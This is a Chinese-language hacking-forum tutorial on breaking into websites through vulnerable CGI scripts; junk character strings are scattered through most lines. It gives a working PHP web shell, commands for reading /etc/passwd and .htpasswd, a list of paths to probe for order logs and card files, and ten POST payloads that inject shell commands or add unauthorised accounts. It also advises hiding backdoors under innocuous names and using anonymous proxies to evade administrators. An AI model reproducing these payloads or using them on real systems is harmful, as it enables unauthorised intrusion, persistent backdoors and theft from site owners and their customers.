CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
, C& u( x+ q+ B2 b: X6 k大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
2 D; T" h& I; Q% y6 a( R这里让我感觉 很有技术交流的感觉
4 ~- S* U2 `) U, K& ?. I我会长长来玩的
前言:
以下讲解针对欧美日本网站
6 T; W# H% w4 x7 e, s/ Q- p2 |* d0 y) ?當我們在做滲透分析的時候 方法有很多
9 i2 X1 s: ~6 U( J2 r" k* g我门都知道 国外伺服器大多是linux 平台
3 j  U& k) t& {. \& {* I6 }所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/

7 [. `  C$ B! [1 [6 N/ M/ C只是个人在实务上一些经验
写的不好 请多多见谅喔
2 k' d+ @: t; e" U  k" y1 _6 F在这里我简单分为几个部份一定要會的
讲解一下
, Y$ c) `9 y: |- L" u- d. Z( R+ U0 G让没有基础的人很容易上手

以下内容跟帖回复才能看到
. a8 R4 E+ U9 T- Q- f) V2 }==============================

* G+ V* Z) D; Q' _3 w第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
5 i7 q9 I1 U5 p$ e8 E- D
( @' T+ J% T) N- l* @% _9 S! ]对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
5 W! e& J9 a8 X; j* l1 }# J要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
) ~% i8 @9 P; \所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
8 p1 m2 b( Y, L& S0 F
$ O0 J1 z: ^6 C: N6 Y* d第2部份: Unix 指令
以下是一些常见及重要的指令:
+ |7 x* t4 K2 S2 h( B( }pwd: 显示当前目录, 即是後门/程式所在的位置
, N. V2 t9 H" X' l& ?3 w0 J! a如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
- @! s% a7 a# X7 a4 fls -al :详细列出档案资料(当前目录)
9 P" l* T- w0 u4 Als /: 列出根目录
6 F$ n, l- P0 t" ?2 G: u/ ~6 j) f0 Z( Bls /etc: 列出/etc的资料夹及档案
5 u# a- q& M# E- H9 r; y5 B# Hls ../ -al: 详细列出上一层的资料夹及档案
- ?% ]; U$ q( `* A; d/ O; zcat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
9 `! U5 b% V$ ^2 Y' a$ p9 xcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
, u& T+ t$ q: {) J# k6 Bmkdir 建立目录
rmdir 删除目录
8 r2 {: i% e9 W3 S% G( |- Emv 移动档案
7 h- C( Q) ]9 }4 }9 mrm 删除档案

第3部份: Shell的使用
例如:
http://site.com/refer.php
6 X' {4 @* t% ?( Q' w2 x' ^; _这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
- o- t1 P+ T' K$ K# _% \" y  P</Form>
' l) ^1 a" G( V# t& r2 q<?php
- ^% B, V0 Q- I+ o2 t$cmd = $_POST['cmd'];
/ ~; E1 V$ N7 I, o- X$Output = shell_exec($cmd);
5 v, W, g6 t( R7 J5 y1 P" O3 Uecho $Output;
. o, G3 U8 c: G7 N) }5 p% G) S?>
! \( F, b) I  i* ~8 j4 ]8 V  A. V输入pwd, 可得到绝对路径:
- D8 |) D" `, U) R8 a; s& ?  G/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

$ W5 o" v, m9 q4 r# r/ u* S第4部份: 注意事项
- 使用匿名代理, 保障自己
  l* r$ e* W+ Y' N2 G- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
4 V$ A- w2 s3 x* e, U4 ?( v- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
* Z; k0 h- F4 ~' T( A: k; c6 Z- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
$ e. a4 Q: U+ |+ X9 \; S2 @所以我用简单的叙述形容
开始讲解脚本入侵过程:
# t5 Z! D1 w! K! w9 U在这里提供一些方法思路让大家学习一下

7 I% j. F" V% Z- A1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
9 c4 D$ z. P$ }2 e* O扫洞工具 如:triton..等等
4 Y5 }$ u6 r+ O. S0 w0 pE表
如
" I' h$ w8 M3 c' O/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
. F7 _7 q) \# }& Y/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
, t" }- u6 v: U3 x% O; s& S; [/scripts/cart.pl
% v3 [6 [8 v: K$ S& ^& I4 K3 \3 Q. i/htbin/cart.pl
; b! c& ]1 C/ ?" EE表来源可以是网路收寻或是自己的0 day
4 W; @: P" P0 x( R6 s" a7 i
2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
( I3 @7 R1 Z5 Z4 f# Y一般都是在IE里先看一下的,记住这个返回码哦
& e9 n, I  n' o, H3 iERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
- \$ w9 \# a( p他扫到很多洞 但是不会使用
2 B4 S8 N1 B, L/ b: C( J- o. y因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
/ x" _5 \0 ]# G* w. t3 z% R- c可以是源代码分析 找出介质
9 \* ~$ u* T) z3 u: B- c或是用抓包工具 抓他的语法...等等
' ~, i$ Q! E- G3 q  z% T
$ V7 u+ Y- N- J" M以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
. X" Y) N: A8 T3 w1 u# R1 `& kwei=ren&gen=command
3 X2 J: |# Z: ?8 o/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
: h8 g2 @# c7 w3 S1 Rusername=username&password=password&ref1=|echo;ls|
/form.cgi
) f  C+ v4 ]% Mname=xxxx&email=email&subject=xxxx&response=|echo;ls|
) ?# C' ~- M; c5 @6 Q/addusr.pl
5 N9 g: p; [( p/ F- p" ?' a# ]3 w/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
' a2 W& N  n' w, \1 b( a# B/ccbill-local.asp
post_values=username:password
/count.cgi
( E" ?& l) H+ |5 Dpinfile=|echo;ls -la;exit|
/recon.cgi
3 u. h8 }+ E# V2 V* ^/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
7 U6 n2 _, |0 n& H, `. L1 A- b6 ~vercode=username:password:dseegsow:add:amount<&30>
/ X9 C' A0 m) L; f) S1 K2 Z3 n/af.cgi_browser_out=|echo;ls -la;exit;|
7 i& c. ^" a$ h7 {
. D4 y. w% ~' w. c9 t今天就讲到这  感谢大家支持